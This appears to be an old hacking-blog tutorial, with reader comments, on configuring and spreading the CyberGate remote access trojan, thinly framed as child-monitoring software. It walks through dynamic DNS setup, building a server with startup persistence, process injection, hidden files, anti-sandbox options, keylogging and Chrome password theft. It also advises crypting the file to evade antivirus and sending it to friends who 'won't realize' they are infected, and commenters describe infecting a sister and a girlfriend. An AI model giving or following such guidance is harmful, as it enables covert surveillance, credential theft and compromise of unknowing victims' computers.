Enter your email address:

Delivered by FeedBurner

feedburner count

CyberGate Tutorial and Free Download

Labels: , , , , , ,

In this article I'll be showing you how to install and setup a software called "Cybergate".This is a very effective Children Monitoring software.These genre of Programs are commonly called "RATs (Remote Administration Tools)".With this tool,it is possible to keep a complete watch on your child and his activities on the computer .But you have to make sure you install a file called "server.exe" some how or the other.The details I'll be providing here.

This is probably the best way to keep track of your loved ones. Especially your children's Internet activity.

Features of CyberGate:

File Manager
Process Manager
Service Manager
Device Manager
Window Manager
Regitry Manager
Installed Programs
Active Port list

Screen Capture
Webcam Capture
Password Recovery
Audio Capture

Network Tools:
Socks 4/5 Proxy
HTTP Proxy
Send File
Download and Execute
Open Webpage
URL Redirection

Dos Prompt
Quick Search (for logs)
Extras (open-close CD-ROM etc.)
And Alot More!

Setting up and Installing Cybergate:

First of all download the software from this link.Make sure you don't download them from any website as such as it might be infected with some virus.Please make sure you disable your Anti-Virus before doing this as it might be detected as well.Don,t Worry the Anti-Virus is just over precautionary and tons of users worldwide you this software.If no you can always good about it !

File Details: 
Download: Free Download Cybergate v1.07.5 RAT
File Size: 2.28 MB
File Extension: .rar (Compressed Archive)

1. Start off by going to No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"

3. Now It's Time To "Choose Your Host Name".

Hostname: YourHostName.no-ip.biz
Host Type: DNS Host (A)

Don't Care About The Rest, Once You've Choosen Your Host Name, Press "Create Host" In The Lower Right Bottom.

The Host Is Now Finished! Lets Move On To The No-IP Client.

1. The No-IP Client You Downloaded In The Beginning, Extract It To Your Desktop & Install It.

2. Now When You've Installed It, Open It Up , Log In With Your No-ip Username , Password.

3. When You're Logged In Press "Select Hosts" And Then Check That Little Box With Your Hostname.

Note: Always Have No-IP Open When You Have Cybergate Open!

There! Your No-IP Host !

Setting Up Cybergate 1.07.5

1. Extract The Cybergate File You Downloaded In The Beginning To Your Desktop! Once Extracted, Open It,Wait 20 Seconds For The Agreement To Pass!

2. When It's Open, Press: Control Center,Start.

3. Press: Control Center , Options , Select Listening Ports

4. Once You've Pressed The "Select Listening Ports" This Window Should Appear:

5.Firstly, Write "100" In That Little Box And Press The Blue Arrow. Then It Should Appear Under "Active Ports"

Active Ports: The Port You Will Forward Later!
Connections: Limit: The Max Amount Of Victims You Can Have.
Connection Password: The Connection Password. Use "123456"
[V] Show Password: (Shows Password)

Once This Is Done, Press "Save"!

6. Now We'll Go To The: Control Center , Build , Create Server.

User: First, Press "New" And Name It To: "Plutonium". Once Done, Press "OK"

Now Just Double Click On "Plutonium" Or Press "Plutonium" And Then Press "Forward"

7. Now We're In The "Connection" Tab.

First, Press " - 999" And Then Press Delete.Now Press "Add" And Write Your Hostname In It + :100.Like This:


Change The Identification To: Cyber
Change The PW To: 123456

Note: If You Want To Try The Server On Yourself, Then Delete Both:

- YourHostName.No-ip.biz

And Replace Them With; Since Means "Local Computer or LAN Internet"

Make The DNS/HostName Server First Though!

DNS: Your Host Name, EG:
Port: The Port You Will Forward Later.
Identification: The slave Name
PW: The Password You Wrote In The Options, "123456"

8. Once You're Done With Theese, You'll Move On To The "Installation" Tab.

9. Have The Same Settings As I Do, And Follow The Instructions In The Image!

Install Directory: Where The Server Installs,

%Program Files%

Use The "System"!

Boot: This Is The "Startup" Option. Have Everything Checked.Press "Random" 5 Times And It Will Startup On Your slave Everytime They Start Their Computer!

Directory: Where The Virus Folder Installs
File Name: What The File Will Be Inside The Folder.
Inject Into: What Process It Injects into, Use Default Browser!
[V] Persistance: Keeps Trying To Inject Until Succed.
[V] Hide File: Hides The File, (Not FUD Though!)
[V] CCD: Changes The Creation Date From 16th July To 4 September 2005.
Mutex: Mutex Of The Server, Just Press Random A Couple Of Times!

There We Go, You've Now Completed The "Installation" Tab! Skip The Message of Keylogger Since They Are Pre-Set Already!

10. You Should Now Have Trumbled Into The "Antis" Tab, Have Everything Checked! (Except SANDBOXIE If You Are Gonna TRY IT ON YOURSELF!)

Ok, The Final Tab.. "Creation Of The Server". Have Every Setting As Me!

[V] Use Icon: Yes
[V] Delayed Execution: (How Many Seconds It Takes Until Your Server Injects And They Pop Up In Your RAT)
[V] Google Chrome PW: Yes, Steals Their GC Passwords :)
[X] Bind Files: No, Get An Real Binder Instead! (Have Your Server Crypted Though First!)
[X] Compress With UPX: Makes The Server Smaller But More AV's Detects It!

So after doing all that you have successfully setup your own RAT server which is ready to be tested on yours friends !


Make Sure That....

1.You are properly port-forwarded if using a router.
2.You have the No-IP Client installed and running.
3.Your DNS entries are correctly spelled when building your server.
4.The password in Listening Ports and the password your server uses are identical.
5.You are Listening on the correct ports.
6.Your Firewall is letting connections through on the port you're listening on.
7.Your server is added to excluded files in your Antivirus and Firewall.

What next ?

Now all you have to do is send this file to your friend and make sure he opens it.Once he does so he just won't realize that you actually infected him and your getting all the data from his computer.Make sure you use it only to prank and not to misuse this tool in any way !

Credits: Plutonium

Get Articles from this blog via E-mail !

subscribe to Hackbook.net Enter your email address:

Izaak Jiji said...
October 25, 2011 at 5:15 AM  

Dude your blog is really good..the thing is does isnt there a software called ultimate account hacker pro?...does it work properly?some of my friends said it is working...I am not sure...Could you provide a solution....

Thanks in advance

5416339 said...
October 25, 2011 at 10:42 PM  

@Izaak Jiji I'll see into this :D

skv said...
February 13, 2012 at 8:52 AM  

where to see the the results??? i mean my frnds password and everything...help me out

skv said...
February 13, 2012 at 8:55 AM  

i have double clicked the file server.exe and it is no where yo be seen.....help me that which file is to be sent to my frnd...??

navzone002 said...
March 4, 2012 at 1:03 PM  

I have downloaded the cybergate from the link you have given.
But when i extracted it the folder was empty.
what do i do now?
i have downloaded it 7 times.
result is same.
help me out.

Hackerz said...
April 4, 2012 at 2:36 PM  

i did everything and so when my friends download it how it will work how i will get the information like pass etc..

Nitish Raj said...
July 14, 2012 at 2:34 PM  

even my computer detected it bt thnx

samy sh said...
July 21, 2012 at 6:50 AM  

i have installed the cybergate used filezilla as ftp client and 000webhost as hosting web sit eand cybergate is not working it's server.exe isn't working on victims pc.

Archit Bhardwaj said...
August 2, 2012 at 4:39 AM  

hey, but you did'nt tell the main part of this tutorial...

how will we come to now about the activities of victim's system ??
please answer it soon and people help me out who knows about it, i have installed the server file, but please tell how to view the activities and information of victim's system..
please help me out guys

KarlosAlcantara said...
August 9, 2012 at 2:16 AM  

when i put it on a usb then run it in my sister's computer nothing happened in my computer like the cyber gate is just blank

Gabe Darity said...
August 12, 2012 at 10:59 PM  

This is an Amazing and very useful Tutorial! Thank You So Much!

altariq lucas said...
August 15, 2012 at 2:37 AM  

well obvious its a bunch of bullshit. ugh and wasted time smh -___- im annoyed. this article is buns. the creator of it is probably controlling our damn computers. the steps were very clear, but bs. i wanted to surprise my gf cuz she said i couldnt do it. thanks for confirming it douche bag

hacktheworld156 said...
August 22, 2012 at 2:54 AM  

hey friends i have new and latest hacking tips and tricks vuranablety assesment tutorial

plz visit my blog


deep kumar said...
September 3, 2012 at 6:25 AM  


Tes Blog said...
September 15, 2012 at 10:25 PM  

Woww this is awesomme turorial thank you .. brew-beer.net

jigs said...
October 28, 2012 at 4:37 AM  

only the problem is the file is been detected by anti virus so is there any solution that this file cant be detected as trojan contain??

jigs said...
October 28, 2012 at 4:38 AM  

and if we want to remove the file from victims pc. after he got irritated what is the process??

Tirthapriya said...
December 9, 2012 at 6:33 AM  

how will it work
i mean for example iam offline and i gave it to some one by pendrive he/she double clicked it then what's next if i am not surfing internet (offline)?

Post a Comment

Post a Comment